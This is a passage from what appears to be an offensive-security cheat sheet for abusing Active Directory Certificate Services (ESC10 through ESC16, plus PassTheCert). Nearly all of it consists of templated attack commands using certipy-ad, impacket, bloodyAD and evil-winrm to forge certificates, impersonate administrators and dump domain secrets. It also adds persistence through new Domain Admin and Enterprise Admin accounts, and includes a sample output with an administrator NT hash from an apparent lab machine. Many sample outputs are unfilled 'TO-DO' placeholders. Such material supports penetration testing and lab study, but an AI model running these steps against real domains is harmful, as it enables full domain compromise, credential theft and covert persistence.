[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
5. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
ESC10: Weak Certificate Mapping for Schannel Authentication
1. Request a TGT
# Password
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC_IP>
Sample Output:
TO-DO
export KRB5CCNAME='<USER>.ccache'
Sample Output:
TO-DO
2. Check
# Look for WRITE on altSecurityIdentities
bloodyAD -d <DOMAIN> -k --host <DC> get writable --detail
Sample Output:
altSecurityIdentities: WRITE
# Look for CertificateMappingMethods = 0x4
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\'
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
EventLogging REG_DWORD 0x1
CertificateMappingMethods REG_DWORD 0x4
# Look for Target User UPN
certipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
TO-DO
2. Modify Target User’s userPrincipalName
# Kerberos
certipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' -upn '<DC_HOSTNAME>$@<DOMAIN>' update
Sample Output:
TO-DO
2. Request a Cert of Target User
# Password
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<TARGET_USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<TARGET_USER>' -hashes ':<HASH>' -dc-ip <DC_IP>
Sample Output:
TO-DO
export KRB5CCNAME='<TARGET_USER>.ccache'
Sample Output:
TO-DO
certipy-ad req -k -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'User'
Sample Output:
TO-DO
3. Change Back Target User’s userPrincipalName
export KRB5CCNAME='<USER>.ccache'
Sample Output:
TO-DO
certipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' -upn '<UPN>' update
Sample Output:
TO-DO
4. Get LDAP Shell
certipy-ad auth -pfx '<DC_HOSTNAME>.pfx' -dc-ip '<DC_IP>' -ldap-shell
Sample Output:
TO-DO
5. Set RBCD
set_rbcd <DC_HOSTNAME>$ <USER>
Sample Output:
TO-DO
6. Get a Service Ticket
# Password
impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -spn 'ldap/<DC>' -impersonate <DC_HOSTNAME>
Sample Output:
TO-DO
# NTLM
impacket-getST '<DOMAIN>/<USER>' -hashes ':<HASH>' -spn 'ldap/<DC>' -impersonate <DC_HOSTNAME>
Sample Output:
TO-DO
export KRB5CCNAME='<DC_HOSTNAME>@ldap_<DC>@<DOMAIN>.ccache'
Sample Output:
TO-DO
7. Secretsdump
impacket-secretsdump -k -no-pass <DC>
Sample Output:
TO-DO
ESC13: Issuance Policy with Privileged Group Linked
1. Request a Cert of User
# Password
certipy-ad req -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
# NTLM
certipy-ad req -username '<USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
2. Get a TGT
certipy-ad auth -pfx '<USER>.pfx' -dc-ip '<DC_IP>'
Sample Output:
TO-DO
ESC14a: Weak Explicit Certificate Mapping (altSecurityIdentities)
1. Create a Computer
bloodyAD -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> --host <DC> add computer evilcomputer '<NEW_PASSWORD>'
Sample Output:
TO-DO
2. Request a Cert of the Computer
certipy-ad req -u 'evilcomputer$' -p '<NEW_PASSWORD>' -target <DC> -dc-ip <DC_IP> -ca <CA> -template Machine
Sample Output:
TO-DO
3. Convert .pfx to .crt
certipy-ad cert -pfx evilcomputer.pfx -nokey -out "evilcomputer.crt"
Sample Output:
TO-DO
4. Inspect Serial Number and Issuer
openssl x509 -in evilcomputer.crt -noout -text
Sample Output:
TO-DO
5. Convert to X509 Issuer SerialNumber Format
python3 conv.py -serial '<SERIAL_NUMBER>' -issuer '<ISSUER>'
Sample Output:
TO-DO
6. Update Attribute (From Windows)
$map = '<X509_ISSUER_SERIAL_NUMBER_FORMAT>'
Sample Output:
TO-DO
Set-ADUser <TARGET_USER> -Replace @{altSecurityIdentities=$map}
Sample Output:
TO-DO
7. Get NTLM Hash
certipy-ad auth -pfx evilcomputer.pfx -domain <DOMAIN> -dc-ip <DC_IP> -username '<TARGET_USER>'
Sample Output:
TO-DO
Ref: conv.py
ESC14b: Weak Explicit Certificate Mapping (E-Mail)
1. Modify Email of Target User
# Password
bloodyAD -u '<USER>' -p ':<HASH>' -d <DOMAIN> -f rc4 --host <DC> set object <USER> mail -v '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO
2. Request a Cert
# NTLM
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -dc-ip '<DC_IP>' -ca '<CA>' -template '<TEMPLATE>'
Sample Output:
TO-DO
3. Get NTLM Hash
certipy-ad auth -pfx <USER>.pfx -domain <DOMAIN> -dc-ip <DC_IP> -username <TARGET_USER>
Sample Output:
TO-DO
ESC15: Arbitrary Application Policy Injection in V1 Templates (CVE-2024-49019 "EKUwu")
1. Lookup SID
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -user 'administrator' read
Sample Output:
TO-DO
# NTLM
certipy-ad account -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -user 'administrator' read
Sample Output:
$ certipy-ad account -u 'cert_admin@example.com' -hashes 'f87---[SNIP]---773' -target 'dc01.example.com' -dc-ip '10.10.10.10' -user 'administrator' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=example,DC=com
name : Administrator
objectSid : S-1-5-21-1---[SNIP]---7-500
sAMAccountName : Administrator
userAccountControl : 66048
whenCreated : 2024-11-16T00:01:41+00:00
whenChanged : 2025-07-14T11:03:29+00:00
2. Inject "Client Authentication" Application Policy and Target UPN
# Password
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'WebServer' -upn 'administrator@<DOMAIN>' -sid '<SID>' -application-policies 'Client Authentication'
Sample Output:
TO-DO
# NTLM
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'WebServer' -upn 'administrator@<DOMAIN>' -sid '<SID>' -application-policies 'Client Authentication'
Sample Output:
TO-DO
3. Spawn LDAP Shell
certipy-ad auth -pfx 'administrator.pfx' -domain <DOMAIN> -dc-ip <DC_IP> -ldap-shell
Sample Output:
TO-DO
4. Persistence
# Add New User
add_user <NEW_USER>
Sample Output:
TO-DO
# Add New User to Group
add_user_to_group <NEW_USER> Administrators
Sample Output:
TO-DO
# Add New User to Group
add_user_to_group <NEW_USER> 'Domain Admins'
Sample Output:
TO-DO
# Add New User to Group
add_user_to_group <NEW_USER> 'Enterprise Admins'
Sample Output:
TO-DO
# Add RDP
add_user_to_group <NEW_USER> 'Remote Desktop Users'
Sample Output:
TO-DO
# Add Winrm
add_user_to_group <NEW_USER> 'Remote Management Users'
Sample Output:
TO-DO
ESC16: Security Extension Disabled on CA (Globally)
1. Read Initial UPN of the Victim Account [Optional]
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -user '<TARGET_USER>' read
Sample Output:
TO-DO
2. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -upn 'administrator' -user '<TARGET_USER>' update
Sample Output:
TO-DO
3. Request a Cert as the Victim from Any Suitable Client Authentication Template
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -dc-ip <DC_IP> -target '<DC>' -ca '<CA>' -template 'User'
Sample Output:
TO-DO
4. Revert
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -upn '<TARGET_USER_UPN>' -user '<TARGET_USER>' update
Sample Output:
TO-DO
5. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO
Workaround: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP
1. Create Key and Cert from pfx
certipy-ad cert -pfx '<USER>.pfx' -nocert -out '<USER>.key'
Sample Output:
TO-DO
certipy-ad cert -pfx '<USER>.pfx' -nokey -out '<USER>.crt'
Sample Output:
TO-DO
1. Get a LDAP Shell
python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt '<USER>.crt' -key '<USER>.key' -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO
2. Add User to Administrators Group
add_user_to_group '<USER>' administrators
Sample Output:
TO-DO
3. Remote
evil-winrm -i <TARGET_DOMAIN> -u '<USER>' -p '<PASSWORD>'
Sample Output:
TO-DO
Ref: PassTheCert
1. RBCD Attack
python3 PassTheCert/Python/passthecert.py -action write_rbcd -delegate-to '<TARGET_COMPUTER>$' -delegate-from 'Evil_Computer$' -crt administrator.crt -key administrator.key -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO
2. Request a Service Ticket
sudo ntpdate -s <DC_IP> && impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'
Sample Output:
TO-DO
3. Secrets Dump
export KRB5CCNAME=Administrator.ccache
Sample Output:
TO-DO
impacket-secretsdump '<DOMAIN>/administrator@<TARGET_DOMAIN>' -k -no-pass -just-dc-ntlm
Sample Output:
TO-DO
5. Remote
evil-winrm -i <TARGET_DOMAIN> -u administrator -H <HASH>
Sample Output:
TO-DO
Ref: PassTheCert